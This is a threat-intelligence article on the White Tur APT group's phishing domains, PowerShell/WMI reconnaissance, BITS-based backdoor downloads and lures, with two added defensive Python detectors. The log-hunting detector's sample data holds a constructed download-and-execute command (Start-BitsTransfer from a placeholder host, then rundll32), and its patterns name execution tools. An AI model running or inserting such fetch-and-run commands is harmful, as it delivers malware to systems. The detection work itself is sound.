A threat group called White Tur has been seen adopting methods from other advanced persistent threat (APT) actors. The researchers who identified it say the group has been conducting cyber-attacks since at least mid-2017.
The White Tur operators registered the domain mail[.]mod[.]qov[.]rs to phish login credentials from staff of the Serbian Ministry of Defence.
The ‘qov’ label in that domain, which also appeared in the TLS certificate issued for it, passes at a glance for ‘gov’ (government). The same substitution has been used by the APT group known as Sofacy or APT28, which suggests that White Tur borrows tradecraft from more sophisticated actors.
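The ‘qov’-for-‘gov’ trick is easy to hunt for in a Certificate Transparency or passive-DNS feed. The following is an added example written for this article, not code from the researchers or from White Tur. It refangs indicators, normalises visually confusable characters in each hostname label, and reports hosts whose normalised form contains a protected label (‘gov’) that the raw label does not. The feed below is constructed: only mail[.]mod[.]qov[.]rs comes from the report, and the other hostnames are invented.

```python
"""Flag hostnames that impersonate a 'gov' label with confusable characters.

Added example for this article, not the researchers' tooling. Input is a
constructed list of hostnames of the kind one might pull from a Certificate
Transparency or passive-DNS export; all hosts except mail[.]mod[.]qov[.]rs are
invented.
"""
from typing import List, Optional, Tuple

# What the attacker types -> what the eye reads. 'q' for 'g' is the White Tur
# case; '0' for 'o' is added here as an assumption about common variants.
CONFUSABLES = {"q": "g", "0": "o"}

# Labels worth protecting; only 'gov' here, since that is what
# mail[.]mod[.]qov[.]rs impersonates.
PROTECTED_LABELS = {"gov"}


def refang(host: str) -> str:
    """Turn a defanged indicator like 'mail[.]mod[.]qov[.]rs' into a hostname."""
    return host.replace("[.]", ".").rstrip(".").lower()


def normalize_label(label: str) -> str:
    """Replace confusable characters with the characters they mimic."""
    out = label
    for fake, real in CONFUSABLES.items():
        out = out.replace(fake, real)
    return out


def find_lookalike(host: str) -> Optional[str]:
    """Return the legitimate hostname this host impersonates, or None.

    A hit needs a label that is not itself protected but normalises to a
    protected label ('qov' -> 'gov'); a genuine gov host is not flagged.
    """
    fixed = []
    hit = False
    for label in refang(host).split("."):
        norm = normalize_label(label)
        if norm in PROTECTED_LABELS and label != norm:
            hit = True
            fixed.append(norm)
        else:
            fixed.append(label)
    return ".".join(fixed) if hit else None


def triage(hosts: List[str]) -> List[Tuple[str, str]]:
    """Run find_lookalike over a feed; return (host, impersonated host) pairs."""
    results = []
    for host in hosts:
        target = find_lookalike(host)
        if target:
            results.append((host, target))
    return results


# Constructed sample feed: one real indicator from the report, rest invented.
SAMPLE_FEED = [
    "mail[.]mod[.]qov[.]rs",     # from the report
    "mail.mod.gov.rs",           # legitimate form, must not be flagged
    "portal.g0v.example",        # invented lookalike
    "login.microsoft.example",   # invented, benign
]

if __name__ == "__main__":
    for host, target in triage(SAMPLE_FEED):
        print(f"{host:28} impersonates {target}")
```

Feeding the domain from the report through triage() yields mail.mod.gov.rs as the impersonated host, while the real mail.mod.gov.rs passes untouched; extend PROTECTED_LABELS with your own organisation's labels before running it against a live feed.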
White Tur also abuses the open-source OpenHardwareMonitor project to launch its payload, a technique the researchers believe was copied from ZINC, a North Korea-linked threat group.
White Tur’s tooling may be borrowed in part from other APT groups, but the group also runs attack chains of its own.
In the initial stage of a White Tur intrusion, a PowerShell script collects environment data about the target host through WMI objects and then uses the PowerShell BitsTransfer module to download a backdoor.
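Either half of that first stage is ordinary administration on its own (WMI inventory, BITS file pulls), so a useful detection keys on the combination. The block below is an added example for this article, not the researchers' code: it scores the ScriptBlockText of PowerShell script block log records (event 4104 in Microsoft-Windows-PowerShell/Operational, which requires script block logging to be enabled) for WMI host profiling paired with a BitsTransfer download. The records, the URL, the file names and the weights are constructed for the example.

```python
"""Hunt PowerShell script block logs for WMI recon paired with a BITS download.

Added example for this article, not the researchers' detection logic. Records
mimic the ScriptBlockText of event 4104; all of them, including the URL and
file names, are constructed here. Indicator weights are an assumption.
"""
import re
from typing import Dict, List, Tuple

# (name, pattern, weight). WMI recon alone is common admin activity and gets
# a low weight; the download itself carries the most weight.
INDICATORS = [
    ("wmi_recon", re.compile(
        r"\b(Get-WmiObject|gwmi|Get-CimInstance)\b[^\n]*"
        r"\bWin32_(OperatingSystem|ComputerSystem|Processor|NetworkAdapterConfiguration)\b",
        re.I), 1),
    ("bits_module", re.compile(r"Import-Module\s+BitsTransfer", re.I), 1),
    ("bits_download", re.compile(
        r"\bStart-BitsTransfer\b[^\n]*-Source\s+['\"]?https?://", re.I), 2),
    ("exec_after_download", re.compile(
        r"\b(Invoke-Expression|iex|rundll32|regsvr32|Start-Process)\b", re.I), 1),
]

# Recon plus a BITS download reaches the threshold; either alone does not.
THRESHOLD = 4


def score_script_block(text: str) -> Tuple[int, List[str]]:
    """Return (score, matched indicator names) for one script block."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def hunt(records: List[Dict[str, str]]) -> List[Tuple[str, int, List[str]]]:
    """Score each record and return (id, score, hits) for those over threshold."""
    flagged = []
    for rec in records:
        score, hits = score_script_block(rec["ScriptBlockText"])
        if score >= THRESHOLD:
            flagged.append((rec["id"], score, hits))
    return flagged


# Constructed sample 4104 records. The first mirrors the stage described in the
# article; the other two are benign look-alikes that should not fire.
SAMPLE_RECORDS = [
    {"id": "4104-0001", "ScriptBlockText": (
        "$os = Get-WmiObject -Class Win32_OperatingSystem\n"
        "$cs = Get-WmiObject -Class Win32_ComputerSystem\n"
        "Import-Module BitsTransfer\n"
        "Start-BitsTransfer -Source 'http://example.invalid/s.dll' "
        "-Destination \"$env:TEMP\\s.dll\"\n"
        "rundll32 \"$env:TEMP\\s.dll\",Run")},
    # Admin inventory script: WMI only.
    {"id": "4104-0002", "ScriptBlockText":
        "Get-CimInstance -ClassName Win32_OperatingSystem | Select Caption, Version"},
    # Patch pull: BITS only, no host profiling.
    {"id": "4104-0003", "ScriptBlockText":
        "Start-BitsTransfer -Source 'https://updates.example.invalid/patch.msp' "
        "-Destination C:\\Patches"},
]

if __name__ == "__main__":
    for rec_id, score, hits in hunt(SAMPLE_RECORDS):
        print(f"{rec_id}: score {score}, indicators {', '.join(hits)}")
```

Only the first record crosses the threshold; the inventory script and the patch download each score below it. Tune the Win32_ class list and the weights to your own environment before deploying the logic as a rule.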
The group’s lures are documents themed around government, telecoms, R&D and defence. The delivery mechanisms include macro-enabled documents, HTA files that drop a JavaScript backdoor, PowerShell scripts, XSL files, and documents that exploit CVE-2017-0199, a critical Microsoft Office flaw.
Researchers also observed White Tur deploying a fully functional backdoor delivered as a DLL; it can manage files, set the malware’s sleep interval, upload and download files, and execute commands.
The name Storm Kitty also appears in the PDB path of White Tur’s backdoor. Storm Kitty is an open-source stealer project that collects credentials and logs keystrokes.
White Tur’s targeting concentrates on low-profile regions such as Serbia, where threat intelligence coverage is thin. Researchers suspect the group uses Serbia as a proving ground for its techniques before turning to more prominent countries.